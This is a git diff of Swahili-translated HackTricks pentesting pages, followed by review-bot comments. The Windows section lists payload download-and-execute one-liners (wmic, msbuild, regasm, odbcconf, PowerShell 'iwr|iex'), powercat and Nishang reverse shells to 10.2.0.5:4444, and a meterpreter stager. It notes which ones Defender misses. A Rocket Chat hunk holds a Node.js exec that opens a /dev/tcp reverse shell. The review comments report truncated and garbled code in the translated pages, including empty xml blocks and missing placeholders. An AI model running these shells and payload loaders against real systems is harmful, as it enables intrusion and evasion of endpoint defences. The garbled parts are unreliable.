\\10.2.0.5\kali\shell.msi +``` +**Imepatikana** + +## **Wmic** + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +wmic os get /format:"https://webserver/payload.xsl" +``` +Mfano wa faili ya xsl [kutoka hapa](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): +```xml + + + + + + + +``` +**Haikutambuliwa** + +**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager wmic** + +## Msbuild + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +``` +cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! 
/noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" +``` +Unaweza kutumia mbinu hii kupita Application Whitelisting na vizuizi vya Powershell.exe. Kama utavyoonyeshwa na PS shell.\ +Pakua hii na uifanye: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) +``` +C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj +``` +**Haikutambuliwa** + +## **CSC** + +Kusanya msimbo wa C# kwenye mashine ya mwathirika. +``` +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs +``` +You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) + +**Haijatambuliwa** + +## **Regasm/Regsvc** + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll +``` +**Sijajaribu** + +[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) + +## Odbcconf + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} +``` +**Sijajaribu** + +[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) + +## Powershell Shells + +### PS-Nishang + +[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) + +Katika folda ya **Shells**, kuna shell nyingi tofauti. 
Ili kupakua na kutekeleza Invoke-_PowerShellTcp.ps1_, fanya nakala ya script na ongeza mwishoni mwa faili: +``` +Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 +``` +Anza kuhudumia skripti kwenye seva ya wavuti na uitekeleze upande wa mwathirika: +``` +powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" +``` +Defender haitambui kama msimbo mbaya (bado, 3/04/2019). + +**TODO: Angalia nishang shells nyingine** + +### **PS-Powercat** + +[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) + +Pakua, anzisha seva ya wavuti, anzisha msikilizaji, na uite kwenye upande wa mwathirika: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +Defender haitambui kama msimbo mbaya (bado, 3/04/2019). + +**Chaguzi nyingine zinazotolewa na powercat:** + +Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... +``` +Serve a cmd Shell: +powercat -l -p 443 -e cmd +Send a cmd Shell: +powercat -c 10.1.1.1 -p 443 -e cmd +Send a powershell: +powercat -c 10.1.1.1 -p 443 -ep +Send a powershell UDP: +powercat -c 10.1.1.1 -p 443 -ep -u +TCP Listener to TCP Client Relay: +powercat -l -p 8000 -r tcp:10.1.1.16:443 +Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: +powercat -c 10.1.1.15 -p 443 -e cmd -g +Start A Persistent Server That Serves a File: +powercat -l -p 443 -i C:\inputfile -rep +``` +### Empire + +[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) + +Unda launcher ya powershell, ihifadhi kwenye faili na uipakue na kuitekeleze. 
+``` +powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +**Imegundulika kama msimbo mbaya** + +### MSF-Unicorn + +[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) + +Unda toleo la powershell la backdoor ya metasploit ukitumia unicorn +``` +python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 +``` +Anza msfconsole na rasilimali iliyoundwa: +``` +msfconsole -r unicorn.rc +``` +Anza seva ya wavuti inayotoa faili _powershell\_attack.txt_ na uendeleze katika mwathiriwa: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" +``` +**Imepatikana kama msimbo mbaya** + +## Zaidi + +[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console yenye baadhi ya moduli za PS za kushambulia zilizopakiwa (cyphered)\ +[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ +WinPWN](https://github.com/SecureThisShit/WinPwn) PS console yenye baadhi ya moduli za PS za kushambulia na ugunduzi wa proxy (IEX) + +## Marejeleo + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x) +* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT) +* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/) +* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) +* 
[https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +​ +**Jaribu Kikundi cha Usalama wa Juu** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +Jifunze & fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze & fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 9db636035..68e5ddfbc 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -1,8 +1,8 @@ # Rocket Chat {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -14,7 +14,6 @@ Learn & practice GCP Hacking: {% endhint %} -{% endhint %}
@@ -29,7 +28,7 @@ Ikiwa wewe ni admin ndani ya Rocket Chat unaweza kupata RCE.
-* Kulingana na [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), zote zinatumia ES2015 / ECMAScript 6 ([kimsingi JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) kuchakata data. Hivyo hebu tupate [rev shell kwa javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) kama: +* Kulingana na [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), zote zinatumia ES2015 / ECMAScript 6 ([kimsingi JavaScript](https://codeburst.io/javascript-wtf-is-es6-es-2017-ecmascript-dca859e4821c)) kusindika data. Hivyo hebu tupate [rev shell kwa javascript](../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs) kama: ```javascript const require = console.log.constructor('return process.mainModule.require')(); const { exec } = require('child_process'); @@ -53,9 +52,10 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
{% embed url="https://websec.nl/" %} + {% hint style="success" %} -Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -63,9 +63,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} -
-{% endhint %}
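Review bot: in the new reverse-shells/linux.md most of the network one-liners have lost their host and port placeholders and cannot run as written: `ncat --ssl -c "bash -i 2>&1"` and `ncat -l --ssl` carry no host or port, `openssl s_server -quiet -key key.pem -cert cert.pem -port` has nothing after `-port` and the victim side reads `openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :`, both socat lines have an empty host (`TCP::1337`, `TCP4::1337`), the awk target is `/inet/tcp/0//`, and the first finger loop calls `finger "$X"@ 2> /dev/null'` with no host after `@` and an unmatched single quote. Restore explicit placeholders such as ATTACKER_IP and PORT (two distinct ports for the OpenSSL command/response pair) and close the quote. In the same file the PHP block is truncated: only the tails `$sock, 1=>$sock, 2=>$sock), $pipes); ?>` and `/dev/tcp/10.10.14.8/4444 0>&1'"); ?>` survive, without the `<?php`, fsockopen and proc_open calls that the comment above them describes, so the proc_open variant the comment recommends is not actually shown; the NodeJS block has two lines starting with a stray `-` (`-var x = global.process.mainModule.require`, `-x('child_process').exec(...)`) that look like leftover diff markers; the Java block is fenced as ```bash although its content is Java/Groovy; and the finger section heading was translated to "Kidole" while Ncat, Socat and Awk beside it keep their names, so keep "Finger" as a tool name to stay consistent and searchable.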
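Review bot: in reverse-shells/msfvenom.md the GitBook code tags are unbalanced: the CMD Shell, Teua Amri, Linux Bind Shell and MAC Reverse Shell sections open `{% code overflow="wrap" %}` with no `{% endcode %}` before the next heading, while the PHP and Bash sections end with a `{% endcode %}` that was never opened; either pair every tag or drop them. The synopsis line `msfvenom -p -e -f -i LHOST=` has lost all its placeholders (payload, encoder, format, iteration count, IP) and now reads as an invalid command, and `LHOST= LPORT=` are empty in the plink-embed, PHP and Bash examples, so spell the placeholders out. The PHP helper `cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php` is cut off after `echo '` (the `<?php ' >` part is missing), which leaves an unmatched quote and a command that hangs waiting for input. Finally, the heading `### WAZI` is a dictionary translation of "war" as a word; the section generates the `-f war` output format, so the heading should stay "WAR".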
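Review bot: in reverse-shells/windows.md several examples are wrong for the platform or for the tool: the Regsvr32 Metasploit block sets `set payload windows/meterpreter/reverse/tcp`, which is not a payload name, it should be `windows/meterpreter/reverse_tcp`; the `## OpenSSH` heading sits over OpenSSL `s_server`/`s_client` commands and should read OpenSSL; the Perl one-liner ends in `exec("/bin/sh -i")`, which does not exist on Windows (the Windows variant would exec cmd.exe, and the `'...'` quoting is not honoured by cmd.exe either); the SBD example runs `sbd -l -p 4444 -e bash` and shows `uid=0(root)` output, i.e. a Linux session, not the sbd.exe plus cmd.exe scenario the paragraph describes; the MSIExec section serves shell.msi with `python -m SimpleHTTPServer 80` but the victim line loads `\\10.2.0.5\kali\shell.msi` over SMB, so either serve it with impacket-smbserver as in the PS-Bat section or use `msiexec /quiet /i http://10.2.0.5/shell.msi`; and the Empire launcher line `iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd` carries a `;powercat ...` tail copied from the Powercat section that an Empire stager does not use. Separately, every `xml`/`markup` block in the Mshta, Rundll32, Regsvr32 and Wmic sections is empty in this hunk (the hta-psh example, the hta, sct and xsl files), so those sections document nothing beyond the gist links, and the `nc.exe -e cmd.exe`, `ncat.exe -e ...`, `ncat -l` and OpenSSL lines have lost their host/port placeholders as on the Linux page. Two smaller points: the top hint block is still in English while the rest of the file is Swahili, and in the Zaidi section the link text `[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9]` is truncated and the following `[\ WinPWN]` bracket is split across the line break, which breaks the WinPWN link.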
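Review bot: in the rocket-chat.md hunk at `@@ -29,7 +28,7 @@` the codeburst URL slug changes from `javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c` to `javascript-wtf-is-es6-es-2017-ecmascript-dca859e4821c`; the only intended change on that line is the relative link move to `reverse-shells/linux.md#nodejs`, so the third-party URL should be kept byte-for-byte regardless of whether Medium still resolves it by the trailing id.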
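Review bot: the rocket-chat.md hunks at `@@ -1,8 +1,8 @@` and `@@ -53,9 +52,10 @@` replace the two ARTE/GRTE hint lines with visually identical lines, so the change there is whitespace or non-printing characters only; that is fine to normalise, but the commit message should say so, and the substantive fix in this file, dropping the doubled `{% endhint %}` at `@@ -14,7 +14,6 @@` and `@@ -63,9 +63,7 @@` so each hint block has exactly one close tag, deserves a line of its own in the description.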